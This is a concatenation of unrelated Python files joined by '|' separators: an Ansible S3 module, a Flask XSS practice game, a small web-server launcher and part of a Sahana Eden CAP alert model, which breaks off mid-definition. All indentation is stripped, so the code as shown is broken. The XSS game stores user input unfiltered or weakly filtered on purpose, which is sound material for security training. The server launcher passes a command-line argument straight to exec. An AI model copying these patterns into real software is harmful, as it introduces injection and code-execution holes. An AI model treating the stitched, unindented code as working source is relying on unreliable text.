bucket = s3.lookup(bucket)
key_check = bucket.get_key(obj, version_id=version)
except s3.provider.storage_response_error, e:
if version is not None and e.status == 400: # If a specified version doesn't exist a 400 is returned.
key_check = None
else:
module.fail_json(msg=str(e))
if key_check:
return True
else:
return False
def keysum(module, s3, bucket, obj, version=None):
bucket = s3.lookup(bucket)
key_check = bucket.get_key(obj, version_id=version)
if not key_check:
return None
md5_remote = key_check.etag[1:-1]
etag_multipart = '-' in md5_remote # Check for multipart, etag is not md5
if etag_multipart is True:
module.fail_json(msg="Files uploaded with multipart of s3 are not supported with checksum, unable to compute checksum.")
return md5_remote
def bucket_check(module, s3, bucket):
try:
result = s3.lookup(bucket)
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
if result:
return True
else:
return False
def create_bucket(module, s3, bucket, location=None):
if location is None:
location = Location.DEFAULT
try:
bucket = s3.create_bucket(bucket, location=location)
bucket.set_acl(module.params.get('permission'))
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
if bucket:
return True
def get_bucket(module, s3, bucket):
try:
return s3.lookup(bucket)
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
def list_keys(module, bucket_object, prefix, marker, max_keys):
all_keys = bucket_object.get_all_keys(prefix=prefix, marker=marker, max_keys=max_keys)
keys = [x.key for x in all_keys]
module.exit_json(msg="LIST operation complete", s3_keys=keys)
def delete_bucket(module, s3, bucket):
try:
bucket = s3.lookup(bucket)
bucket_contents = bucket.list()
bucket.delete_keys([key.name for key in bucket_contents])
bucket.delete()
return True
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
def delete_key(module, s3, bucket, obj):
try:
bucket = s3.lookup(bucket)
bucket.delete_key(obj)
module.exit_json(msg="Object deleted from bucket %s"%bucket, changed=True)
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
def create_dirkey(module, s3, bucket, obj):
try:
bucket = s3.lookup(bucket)
key = bucket.new_key(obj)
key.set_contents_from_string('')
module.exit_json(msg="Virtual directory %s created in bucket %s" % (obj, bucket.name), changed=True)
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
def path_check(path):
if os.path.exists(path):
return True
else:
return False
def upload_s3file(module, s3, bucket, obj, src, expiry, metadata, encrypt, headers):
try:
bucket = s3.lookup(bucket)
key = bucket.new_key(obj)
if metadata:
for meta_key in metadata.keys():
key.set_metadata(meta_key, metadata[meta_key])
key.set_contents_from_filename(src, encrypt_key=encrypt, headers=headers)
key.set_acl(module.params.get('permission'))
url = key.generate_url(expiry)
module.exit_json(msg="PUT operation complete", url=url, changed=True)
except s3.provider.storage_copy_error, e:
module.fail_json(msg= str(e))
def download_s3file(module, s3, bucket, obj, dest, retries, version=None):
    # retries is the number of additional attempts on SSL errors;
    # range() needs retries + 1 iterations to include the initial attempt.
bucket = s3.lookup(bucket)
key = bucket.get_key(obj, version_id=version)
for x in range(0, retries + 1):
try:
key.get_contents_to_filename(dest)
module.exit_json(msg="GET operation complete", changed=True)
except s3.provider.storage_copy_error, e:
module.fail_json(msg= str(e))
except SSLError as e:
# actually fail on last pass through the loop.
if x >= retries:
module.fail_json(msg="s3 download failed; %s" % e)
# otherwise, try again, this may be a transient timeout.
pass
def download_s3str(module, s3, bucket, obj, version=None):
try:
bucket = s3.lookup(bucket)
key = bucket.get_key(obj, version_id=version)
contents = key.get_contents_as_string()
module.exit_json(msg="GET operation complete", contents=contents, changed=True)
except s3.provider.storage_copy_error, e:
module.fail_json(msg= str(e))
def get_download_url(module, s3, bucket, obj, expiry, changed=True):
try:
bucket = s3.lookup(bucket)
key = bucket.lookup(obj)
url = key.generate_url(expiry)
module.exit_json(msg="Download url:", url=url, expiry=expiry, changed=changed)
except s3.provider.storage_response_error, e:
module.fail_json(msg= str(e))
def is_fakes3(s3_url):
""" Return True if s3_url has scheme fakes3:// """
if s3_url is not None:
return urlparse.urlparse(s3_url).scheme in ('fakes3', 'fakes3s')
else:
return False
def is_walrus(s3_url):
""" Return True if it's Walrus endpoint, not S3
We assume anything other than *.amazonaws.com is Walrus"""
if s3_url is not None:
o = urlparse.urlparse(s3_url)
return not o.hostname.endswith('amazonaws.com')
else:
return False
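# For example (hypothetical URLs): is_walrus('https://s3.amazonaws.com') is
# False, while is_walrus('https://walrus.example.edu:8773/services/Walrus') is
# True, since only *.amazonaws.com hostnames are treated as S3.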
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
bucket = dict(required=True),
dest = dict(default=None),
encrypt = dict(default=True, type='bool'),
expiry = dict(default=600, aliases=['expiration']),
headers = dict(type='dict'),
marker = dict(default=None),
max_keys = dict(default=1000),
metadata = dict(type='dict'),
mode = dict(choices=['get', 'put', 'delete', 'create', 'geturl', 'getstr', 'delobj', 'list'], required=True),
object = dict(),
permission = dict(choices=['private', 'public-read', 'public-read-write', 'authenticated-read'], default='private'),
version = dict(default=None),
overwrite = dict(aliases=['force'], default='always'),
prefix = dict(default=None),
retries = dict(aliases=['retry'], type='int', default=0),
s3_url = dict(aliases=['S3_URL']),
src = dict(),
),
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
bucket = module.params.get('bucket')
encrypt = module.params.get('encrypt')
expiry = int(module.params['expiry'])
if module.params.get('dest'):
dest = os.path.expanduser(module.params.get('dest'))
headers = module.params.get('headers')
marker = module.params.get('marker')
max_keys = module.params.get('max_keys')
metadata = module.params.get('metadata')
mode = module.params.get('mode')
obj = module.params.get('object')
version = module.params.get('version')
overwrite = module.params.get('overwrite')
prefix = module.params.get('prefix')
retries = module.params.get('retries')
s3_url = module.params.get('s3_url')
src = module.params.get('src')
if overwrite not in ['always', 'never', 'different']:
if module.boolean(overwrite):
overwrite = 'always'
else:
overwrite='never'
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
if region in ('us-east-1', '', None):
# S3ism for the US Standard region
location = Location.DEFAULT
else:
# Boto uses symbolic names for locations but region strings will
# actually work fine for everything except us-east-1 (US Standard)
location = region
if module.params.get('object'):
obj = os.path.expanduser(module.params['object'])
# allow eucarc environment variables to be used if ansible vars aren't set
if not s3_url and 'S3_URL' in os.environ:
s3_url = os.environ['S3_URL']
# bucket names with .'s in them need to use the calling_format option,
# otherwise the connection will fail. See https://github.com/boto/boto/issues/2836
# for more details.
if '.' in bucket:
aws_connect_kwargs['calling_format'] = OrdinaryCallingFormat()
# Look at s3_url and tweak connection settings
# if connecting to Walrus or fakes3
try:
if is_fakes3(s3_url):
fakes3 = urlparse.urlparse(s3_url)
s3 = S3Connection(
is_secure=fakes3.scheme == 'fakes3s',
host=fakes3.hostname,
port=fakes3.port,
calling_format=OrdinaryCallingFormat(),
**aws_connect_kwargs
)
elif is_walrus(s3_url):
walrus = urlparse.urlparse(s3_url).hostname
s3 = boto.connect_walrus(walrus, **aws_connect_kwargs)
else:
s3 = boto.s3.connect_to_region(location, is_secure=True, **aws_connect_kwargs)
# use this as fallback because connect_to_region seems to fail in boto + non 'classic' aws accounts in some cases
if s3 is None:
s3 = boto.connect_s3(**aws_connect_kwargs)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg='No Authentication Handler found: %s ' % str(e))
except Exception, e:
module.fail_json(msg='Failed to connect to S3: %s' % str(e))
if s3 is None: # this should never happen
module.fail_json(msg ='Unknown error, failed to create s3 connection, no information from boto.')
# If our mode is a GET operation (download), go through the procedure as appropriate ...
if mode == 'get':
        # First, check that the target bucket exists.
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is False:
module.fail_json(msg="Target bucket cannot be found", failed=True)
        # Next, we check to see if the key in the bucket exists; its checksum is compared with the local file further below.
keyrtn = key_check(module, s3, bucket, obj, version=version)
if keyrtn is False:
if version is not None:
module.fail_json(msg="Key %s with version id %s does not exist."% (obj, version), failed=True)
else:
module.fail_json(msg="Key %s does not exist."%obj, failed=True)
        # If the destination path doesn't exist or overwrite is 'always', no need to do the md5sum/ETag check, so just download.
pathrtn = path_check(dest)
if pathrtn is False or overwrite == 'always':
download_s3file(module, s3, bucket, obj, dest, retries, version=version)
# Compare the remote MD5 sum of the object with the local dest md5sum, if it already exists.
if pathrtn is True:
md5_remote = keysum(module, s3, bucket, obj, version=version)
md5_local = module.md5(dest)
if md5_local == md5_remote:
sum_matches = True
if overwrite == 'always':
download_s3file(module, s3, bucket, obj, dest, retries, version=version)
else:
module.exit_json(msg="Local and remote object are identical, ignoring. Use overwrite=always parameter to force.", changed=False)
else:
sum_matches = False
if overwrite in ('always', 'different'):
download_s3file(module, s3, bucket, obj, dest, retries, version=version)
else:
module.exit_json(msg="WARNING: Checksums do not match. Use overwrite parameter to force download.")
# Firstly, if key_matches is TRUE and overwrite is not enabled, we EXIT with a helpful message.
if sum_matches is True and overwrite == 'never':
module.exit_json(msg="Local and remote object are identical, ignoring. Use overwrite parameter to force.", changed=False)
# if our mode is a PUT operation (upload), go through the procedure as appropriate ...
if mode == 'put':
# Use this snippet to debug through conditionals:
# module.exit_json(msg="Bucket return %s"%bucketrtn)
# sys.exit(0)
# Lets check the src path.
pathrtn = path_check(src)
if pathrtn is False:
module.fail_json(msg="Local object for PUT does not exist", failed=True)
# Lets check to see if bucket exists to get ground truth.
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is True:
keyrtn = key_check(module, s3, bucket, obj)
# Lets check key state. Does it exist and if it does, compute the etag md5sum.
if bucketrtn is True and keyrtn is True:
md5_remote = keysum(module, s3, bucket, obj)
md5_local = module.md5(src)
if md5_local == md5_remote:
sum_matches = True
if overwrite == 'always':
upload_s3file(module, s3, bucket, obj, src, expiry, metadata, encrypt, headers)
else:
get_download_url(module, s3, bucket, obj, expiry, changed=False)
else:
sum_matches = False
if overwrite in ('always', 'different'):
upload_s3file(module, s3, bucket, obj, src, expiry, metadata, encrypt, headers)
else:
module.exit_json(msg="WARNING: Checksums do not match. Use overwrite parameter to force upload.")
# If neither exist (based on bucket existence), we can create both.
if bucketrtn is False and pathrtn is True:
create_bucket(module, s3, bucket, location)
upload_s3file(module, s3, bucket, obj, src, expiry, metadata, encrypt, headers)
# If bucket exists but key doesn't, just upload.
if bucketrtn is True and pathrtn is True and keyrtn is False:
upload_s3file(module, s3, bucket, obj, src, expiry, metadata, encrypt, headers)
# Delete an object from a bucket, not the entire bucket
if mode == 'delobj':
if obj is None:
module.fail_json(msg="object parameter is required", failed=True);
if bucket:
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is True:
deletertn = delete_key(module, s3, bucket, obj)
if deletertn is True:
module.exit_json(msg="Object %s deleted from bucket %s." % (obj, bucket), changed=True)
else:
module.fail_json(msg="Bucket does not exist.", changed=False)
else:
module.fail_json(msg="Bucket parameter is required.", failed=True)
# Delete an entire bucket, including all objects in the bucket
if mode == 'delete':
if bucket:
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is True:
deletertn = delete_bucket(module, s3, bucket)
if deletertn is True:
module.exit_json(msg="Bucket %s and all keys have been deleted."%bucket, changed=True)
else:
module.fail_json(msg="Bucket does not exist.", changed=False)
else:
module.fail_json(msg="Bucket parameter is required.", failed=True)
# Support for listing a set of keys
if mode == 'list':
bucket_object = get_bucket(module, s3, bucket)
# If the bucket does not exist then bail out
if bucket_object is None:
module.fail_json(msg="Target bucket (%s) cannot be found"% bucket, failed=True)
list_keys(module, bucket_object, prefix, marker, max_keys)
# Need to research how to create directories without "populating" a key, so this should just do bucket creation for now.
# WE SHOULD ENABLE SOME WAY OF CREATING AN EMPTY KEY TO CREATE "DIRECTORY" STRUCTURE, AWS CONSOLE DOES THIS.
if mode == 'create':
if bucket and not obj:
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is True:
module.exit_json(msg="Bucket already exists.", changed=False)
else:
module.exit_json(msg="Bucket created successfully", changed=create_bucket(module, s3, bucket, location))
if bucket and obj:
bucketrtn = bucket_check(module, s3, bucket)
if obj.endswith('/'):
dirobj = obj
else:
dirobj = obj + "/"
if bucketrtn is True:
keyrtn = key_check(module, s3, bucket, dirobj)
if keyrtn is True:
module.exit_json(msg="Bucket %s and key %s already exists."% (bucket, obj), changed=False)
else:
create_dirkey(module, s3, bucket, dirobj)
if bucketrtn is False:
created = create_bucket(module, s3, bucket, location)
create_dirkey(module, s3, bucket, dirobj)
# Support for grabbing the time-expired URL for an object in S3/Walrus.
if mode == 'geturl':
if bucket and obj:
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is False:
module.fail_json(msg="Bucket %s does not exist."%bucket, failed=True)
else:
keyrtn = key_check(module, s3, bucket, obj)
if keyrtn is True:
get_download_url(module, s3, bucket, obj, expiry)
else:
module.fail_json(msg="Key %s does not exist."%obj, failed=True)
else:
module.fail_json(msg="Bucket and Object parameters must be set", failed=True)
if mode == 'getstr':
if bucket and obj:
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is False:
module.fail_json(msg="Bucket %s does not exist."%bucket, failed=True)
else:
keyrtn = key_check(module, s3, bucket, obj, version=version)
if keyrtn is True:
download_s3str(module, s3, bucket, obj, version=version)
else:
if version is not None:
module.fail_json(msg="Key %s with version id %s does not exist."% (obj, version), failed=True)
else:
module.fail_json(msg="Key %s does not exist."%obj, failed=True)
module.exit_json(failed=False)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
|
# coding:utf-8
from flask import Flask, url_for, render_template, request, Response, session, redirect
from . import hackgame1
from ..models.message import Messages
from ..utils.random_token import random_token
from ..utils.string_filter import script_tag_recursive_filter, script_tag_filter, script_tag_nf_filter
levels_map = [
lambda x: x,
script_tag_filter,
script_tag_nf_filter,
script_tag_recursive_filter
]
levels_tip_map=[
"",
"",
"",
""
]
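# Each stage applies its filter (index stage-1 in levels_map) to the submitted
# content before it is stored; e.g. (hypothetical payload)
# levels_map[1]('<script>alert(1)</script>') runs script_tag_filter on it,
# while stage 1 (levels_map[0]) stores the content unchanged.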
@DeprecationWarning
def generate_indentity(fn):
def wrapper():
print "generate!!!"
if session.get('token') is None:
session['token'] = random_token()
fn()
return wrapper
@hackgame1.route('/')
def index():
if not session.get('token'):
session['token'] = random_token()
return render_template('hackgame1/index.html')
@hackgame1.route('/add_message', methods=['POST'])
def add_message():
stage = request.form.get('redirect')
content = request.form.get('content')
try:
print stage+" submit"
stage = int(stage)
except ValueError as e:
print e.message
return 'invalid request', 400
try:
content=levels_map[stage-1](content)
except:
return 'invalid request', 400
token = session.get('token')
Messages.add_message("", content, token)
return redirect(url_for('hackgame1.stage', level=stage))
@hackgame1.route('/delete_message', methods=['POST'])
def delete_message():
id = request.form.get('id')
Messages.delete_message(id)
redirect_method = request.form.get('redirect')
return redirect(url_for('hackgame1.stage', level=redirect_method))
# template test
@hackgame1.route('/delete_my_message', methods=['POST'])
def delete_my_message():
token = session.get('token')
if Messages.delete_my_message(token):
return "success"
else:
return "failed"
@hackgame1.route('/tt1')
def template_test_board():
return render_template('hackgame1/board.html')
@hackgame1.route('/stage')
def stage():
stage = request.args.get('level')
try:
stage = int(stage)
except ValueError as e:
print e.message
return 'invalid request', 400
if stage > len(levels_map)+1:
print stage
print len(levels_map)
return 'invalid argument', 404
current_stage = stage
try:
tip=levels_tip_map[stage]
except IndexError as e:
tip = None
print e.message
if stage < len(levels_map):
next_stage = current_stage + 1
else:
next_stage = None
messages = Messages.fetch_messages_by_token(session.get('token') or "")
return render_template('hackgame1/board.html', messages=messages, current_stage=current_stage,
next_stage=next_stage,tip=tip)
# # Stage 1
# @hackgame1.route('/stage1')
# def stage1():
# current_stage = 'stage1'
# next_stage = 'stage2'
# messages = Messages.fetch_messages_by_token(session.get('token') or "")
# return render_template('hackgame1/board.html', messages=messages, current_stage=current_stage,
# next_stage=next_stage)
#
#
# # Stage 2
# @hackgame1.route('/stage2')
# def stage2():
# current_stage = 'stage2'
# next_stage = 'stage3'
# messages = Messages.fetch_messages_by_token(session.get('token') or "")
# return render_template('hackgame1/board.html', messages=messages, current_stage=current_stage,
# next_stage=next_stage)
#
#
# @hackgame1.route('/stage3')
# def stage3():
# return
#
#
# @hackgame1.route('/stage4')
# def stage4():
# return
|
#!/usr/bin/python
###########################
#
# tiger 1.0
# (C) 2014 WatsonSoft
# made by JamesWatson
#
###########################
#encoding=utf-8
import sys
import os
import inspect
import threading
from socket import *
from time import sleep
sys.path.append(os.getcwd()+"/../lib")
sys.path.append(os.getcwd()+"/../lib/WS_tiger")
from HttpDict import *
from debug import *
from HttpDispatcher import *
from SessionManager import *
from webServerKernel import *
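# main() below expects ../etc/WS_tiger/config.ini to contain "key = value"
# lines; the keys read in this file are webApp, WEB, SSL, proPort, prosPort,
# ctrlAddr, ctrlPort and shutTime. Example values (hypothetical):
#
#   webApp = /srv/tiger/webapps
#   WEB = true
#   proPort = 8080
#   SSL = false
#   prosPort = 8443
#   ctrlAddr = 127.0.0.1
#   ctrlPort = 9000
#   shutTime = 5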
def HttpServCtrl(dispatcher, sm, addr, max):
logPuts("ctrl thread running...")
ss = socket(AF_INET, SOCK_STREAM)
ss.bind(addr)
ss.listen(max)
while(True):
csfd, Caddr = ss.accept()
break
csfd.recv(65535)
head = "HTTP/1.1 200 OK\r\n"
head+= "Content-Type: text/html; UTF-8\r\n"
head+= "Server: WS_Tiger/1.0\r\n"
head+= "Content-Encoding: identity\r\n"
head+= "Accept-Ranges: bytes\r\n\r\n\r\n"
page = "<!DOCTYPE html>\n<html>\n<head><title>Server Control</title></head>\n<body>\n\t<h1>Server will Close"
application.setAttr('Head', head)
application.setAttr('Page', page + "d!</h1>\n</body>\n</html>")
shutTime = cfg['shutTime']
page += ", out time is "+ shutTime +"s!</h1>\n</body>\n</html>"
csfd.send(head)
csfd.send(page)
csfd.close()
application.setAttr('ServState', "shutDown")
ss.close()
def main():
this_file = inspect.getfile(inspect.currentframe())
here = os.path.abspath(os.path.dirname(this_file))
try:
os.chdir( "../etc/WS_tiger" )
fd = open( 'config.ini' )
text = fd.read()
fd.close()
cfgText(cfg, text, "\n", " = ")
for i in cfg:
if( '\r' == cfg[ i ][-1] ):
cfg[ i ] = cfg[ i ][:-1]
os.chdir( cfg['webApp'] )
cwd = os.getcwd()
sys.path.append( cwd )
sys.path.append( cwd+"/lib" )
os.chdir( "ROOT" )
except Exception as e:
print(e)
exit(1)
dispatcher = HttpDispatcher()
sm = SessionManager()
logPuts("init finish...")
if( "true" == cfg['WEB'] ):
tPro= threading.Thread( target=HttpServCore, args=(dispatcher, sm, ('', int(cfg['proPort'])), 5) )
tPro.setDaemon(True)
tPro.start()
logPuts("core thread running...")
if( "true" == cfg['SSL'] ):
tPros=threading.Thread( target=HttpServSafe, args=(dispatcher, sm, ('', int(cfg['prosPort'])), 5) )
tPros.setDaemon(True)
tPros.start()
logPuts("safe thread running...")
HttpServCtrl(dispatcher, sm, (cfg['ctrlAddr'], int(cfg['ctrlPort'])), 5)
shutTime = cfg['shutTime']
sleep(int(shutTime))
return
def version():
print('WS_tiger 1.0')
print('(C) 2014 WatsonSoft')
print('made by JamesWatson')
print('This is free software; see the source for copying conditions.')
print('There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n')
def help():
print('Usage: WS_tiger [options]')
print('Options:')
print(' --help Display this information')
    print('  --version     Display version information\n')
if '__main__' == __name__:
if( 1 < len(sys.argv) ):
try:
com = sys.argv[1][2:]+"()"
exec(com)
exit(0)
except Exception as e:
help()
exit(1)
logPuts("Server is launching...")
main()
logPuts("Server has been terminated.")
exit(0)
|
# -*- coding: utf-8 -*-
""" Sahana Eden Common Alerting Protocol (CAP) Model
@copyright: 2009-2014 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3CAPModel",
"cap_info_labels",
"cap_alert_is_template",
"cap_rheader",
"cap_gis_location_xml_post_parse",
"cap_gis_location_xml_post_render",
)
import datetime
import urllib2 # Needed for quoting & error handling on fetch
try:
from cStringIO import StringIO # Faster, where available
except:
from StringIO import StringIO
from gluon import *
from gluon.storage import Storage
from gluon.tools import fetch
from ..s3 import *
# =============================================================================
class S3CAPModel(S3Model):
"""
CAP: Common Alerting Protocol
- this module is a non-functional stub
http://eden.sahanafoundation.org/wiki/BluePrint/Messaging#CAP
"""
names = ("cap_alert",
"cap_alert_represent",
"cap_info",
"cap_info_represent",
"cap_resource",
"cap_area",
"cap_area_represent",
"cap_area_location",
"cap_area_tag",
"cap_info_category_opts",
)
def model(self):
T = current.T
db = current.db
settings = current.deployment_settings
add_components = self.add_components
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# List of Incident Categories -- copied from irs module <--
# @ToDo: Switch to using event_incident_type
#
# The keys are based on the Canadian ems.incident hierarchy, with a
# few extra general versions added to 'other'
# The values are meant for end-users, so can be customised as-required
# NB It is important that the meaning of these entries is not changed
# as otherwise this hurts our ability to do synchronisation
# Entries can be hidden from user view in the controller.
# Additional sets of 'translations' can be added to the tuples.
cap_incident_type_opts = {
"animalHealth.animalDieOff": T("Animal Die Off"),
"animalHealth.animalFeed": T("Animal Feed"),
"aviation.aircraftCrash": T("Aircraft Crash"),
"aviation.aircraftHijacking": T("Aircraft Hijacking"),
"aviation.airportClosure": T("Airport Closure"),
"aviation.airspaceClosure": T("Airspace Closure"),
"aviation.noticeToAirmen": T("Notice to Airmen"),
"aviation.spaceDebris": T("Space Debris"),
"civil.demonstrations": T("Demonstrations"),
"civil.dignitaryVisit": T("Dignitary Visit"),
"civil.displacedPopulations": T("Displaced Populations"),
"civil.emergency": T("Civil Emergency"),
"civil.looting": T("Looting"),
"civil.publicEvent": T("Public Event"),
"civil.riot": T("Riot"),
"civil.volunteerRequest": T("Volunteer Request"),
"crime": T("Crime"),
"crime.bomb": T("Bomb"),
"crime.bombExplosion": T("Bomb Explosion"),
"crime.bombThreat": T("Bomb Threat"),
"crime.dangerousPerson": T("Dangerous Person"),
"crime.drugs": T("Drugs"),
"crime.homeCrime": T("Home Crime"),
"crime.illegalImmigrant": T("Illegal Immigrant"),
"crime.industrialCrime": T("Industrial Crime"),
"crime.poisoning": T("Poisoning"),
"crime.retailCrime": T("Retail Crime"),
"crime.shooting": T("Shooting"),
"crime.stowaway": T("Stowaway"),
"crime.terrorism": T("Terrorism"),
"crime.vehicleCrime": T("Vehicle Crime"),
"fire": T("Fire"),
"fire.forestFire": T("Forest Fire"),
"fire.hotSpot": T("Hot Spot"),
"fire.industryFire": T("Industry Fire"),
"fire.smoke": T("Smoke"),
"fire.urbanFire": T("Urban Fire"),
"fire.wildFire": T("Wild Fire"),
"flood": T("Flood"),
"flood.damOverflow": T("Dam Overflow"),
"flood.flashFlood": T("Flash Flood"),
"flood.highWater": T("High Water"),
"flood.overlandFlowFlood": T("Overland Flow Flood"),
"flood.tsunami": T("Tsunami"),
"geophysical.avalanche": T("Avalanche"),
"geophysical.earthquake": T("Earthquake"),
"geophysical.lahar": T("Lahar"),
"geophysical.landslide": T("Landslide"),
"geophysical.magneticStorm": T("Magnetic Storm"),
"geophysical.meteorite": T("Meteorite"),
"geophysical.pyroclasticFlow": T("Pyroclastic Flow"),
"geophysical.pyroclasticSurge": T("Pyroclastic Surge"),
"geophysical.volcanicAshCloud": T("Volcanic Ash Cloud"),
"geophysical.volcanicEvent": T("Volcanic Event"),
"hazardousMaterial": T("Hazardous Material"),
"hazardousMaterial.biologicalHazard": T("Biological Hazard"),
"hazardousMaterial.chemicalHazard": T("Chemical Hazard"),
"hazardousMaterial.explosiveHazard": T("Explosive Hazard"),
"hazardousMaterial.fallingObjectHazard": T("Falling Object Hazard"),
"hazardousMaterial.infectiousDisease": T("Infectious Disease (Hazardous Material)"),
"hazardousMaterial.poisonousGas": T("Poisonous Gas"),
"hazardousMaterial.radiologicalHazard": T("Radiological Hazard"),
"health.infectiousDisease": T("Infectious Disease"),
"health.infestation": T("Infestation"),
"ice.iceberg": T("Iceberg"),
"ice.icePressure": T("Ice Pressure"),
"ice.rapidCloseLead": T("Rapid Close Lead"),
"ice.specialIce": T("Special Ice"),
"marine.marineSecurity": T("Marine Security"),
"marine.nauticalAccident": T("Nautical Accident"),
"marine.nauticalHijacking": T("Nautical Hijacking"),
"marine.portClosure": T("Port Closure"),
"marine.specialMarine": T("Special Marine"),
"meteorological.blizzard": T("Blizzard"),
"meteorological.blowingSnow": T("Blowing Snow"),
"meteorological.drought": T("Drought"),
"meteorological.dustStorm": T("Dust Storm"),
"meteorological.fog": T("Fog"),
"meteorological.freezingDrizzle": T("Freezing Drizzle"),
"meteorological.freezingRain": T("Freezing Rain"),
"meteorological.freezingSpray": T("Freezing Spray"),
"meteorological.hail": T("Hail"),
"meteorological.hurricane": T("Hurricane"),
"meteorological.rainFall": T("Rain Fall"),
"meteorological.snowFall": T("Snow Fall"),
"meteorological.snowSquall": T("Snow Squall"),
"meteorological.squall": T("Squall"),
"meteorological.stormSurge": T("Storm Surge"),
"meteorological.thunderstorm": T("Thunderstorm"),
"meteorological.tornado": T("Tornado"),
"meteorological.tropicalStorm": T("Tropical Storm"),
"meteorological.waterspout": T("Waterspout"),
"meteorological.winterStorm": T("Winter Storm"),
"missingPerson": T("Missing Person"),
# http://en.wikipedia.org/wiki/Amber_Alert
"missingPerson.amberAlert": T("Child Abduction Emergency"),
"missingPerson.missingVulnerablePerson": T("Missing Vulnerable Person"),
# http://en.wikipedia.org/wiki/Silver_Alert
"missingPerson.silver": T("Missing Senior Citizen"),
"publicService.emergencySupportFacility": T("Emergency Support Facility"),
"publicService.emergencySupportService": T("Emergency Support Service"),
"publicService.schoolClosure": T("School Closure"),
"publicService.schoolLockdown": T("School Lockdown"),
"publicService.serviceOrFacility": T("Service or Facility"),
"publicService.transit": T("Transit"),
"railway.railwayAccident": T("Railway Accident"),
"railway.railwayHijacking": T("Railway Hijacking"),
"roadway.bridgeClosure": T("Bridge Closed"),
"roadway.hazardousRoadConditions": T("Hazardous Road Conditions"),
"roadway.roadwayAccident": T("Road Accident"),
"roadway.roadwayClosure": T("Road Closed"),
"roadway.roadwayDelay": T("Road Delay"),
"roadway.roadwayHijacking": T("Road Hijacking"),
"roadway.roadwayUsageCondition": T("Road Usage Condition"),
"roadway.trafficReport": T("Traffic Report"),
"temperature.arcticOutflow": T("Arctic Outflow"),
"temperature.coldWave": T("Cold Wave"),
"temperature.flashFreeze": T("Flash Freeze"),
"temperature.frost": T("Frost"),
"temperature.heatAndHumidity": T("Heat and Humidity"),
"temperature.heatWave": T("Heat Wave"),
"temperature.windChill": T("Wind Chill"),
"wind.galeWind": T("Gale Wind"),
"wind.hurricaneForceWind": T("Hurricane Force Wind"),
"wind.stormForceWind": T("Storm Force Wind"),
"wind.strongWind": T("Strong Wind"),
"other.buildingCollapsed": T("Building Collapsed"),
"other.peopleTrapped": T("People Trapped"),
"other.powerFailure": T("Power Failure"),
}
# ---------------------------------------------------------------------
# CAP alerts
#
# CAP alert Status Code (status)
cap_alert_status_code_opts = OrderedDict([
("Actual", T("Actual - actionable by all targeted recipients")),
("Exercise", T("Exercise - only for designated participants (decribed in note)")),
("System", T("System - for internal functions")),
("Test", T("Test - testing, all recipients disregard")),
("Draft", T("Draft - not actionable in its current form")),
])
# CAP alert message type (msgType)
cap_alert_msgType_code_opts = OrderedDict([
("Alert", T("Alert: Initial information requiring attention by targeted recipients")),
("Update", T("Update: Update and supercede earlier message(s)")),
("Cancel", T("Cancel: Cancel earlier message(s)")),
("Ack", T("Ack: Acknowledge receipt and acceptance of the message(s)")),
("Error", T("Error: Indicate rejection of the message(s)")),
])
# CAP alert scope
cap_alert_scope_code_opts = OrderedDict([
("Public", T("Public - unrestricted audiences")),
("Restricted", T("Restricted - to users with a known operational requirement (described in restriction)")),
("Private", T("Private - only to specified addresses (mentioned as recipients)"))
])
# CAP info categories
cap_info_category_opts = OrderedDict([
("Geo", T("Geophysical (inc. landslide)")),
("Met", T("Meteorological (inc. flood)")),
("Safety", T("General emergency and public safety")),
("Security", T("Law enforcement, military, homeland and local/private security")),
("Rescue", T("Rescue and recovery")),
("Fire", T("Fire suppression and rescue")),
("Health", T("Medical and public health")),
("Env", T("Pollution and other environmental")),
("Transport", T("Public and private transportation")),
("Infra", T("Utility, telecommunication, other non-transport infrastructure")),
("CBRNE", T("Chemical, Biological, Radiological, Nuclear or High-Yield Explosive threat or attack")),
("Other", T("Other events")),
])
tablename = "cap_alert"
define_table(tablename,
Field("is_template", "boolean",
readable = False,
writable = True,
),
Field("template_id", "reference cap_alert",
label = T("Template"),
ondelete = "RESTRICT",
represent = self.template_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "cap_alert.id",
self.template_represent,
filterby="is_template",
filter_opts=(True,)
)),
comment = T("Apply a template"),
),
Field("template_title",
label = T("Template Title"),
),
Field("template_settings", "text",
default = "{}",
readable = False,
),
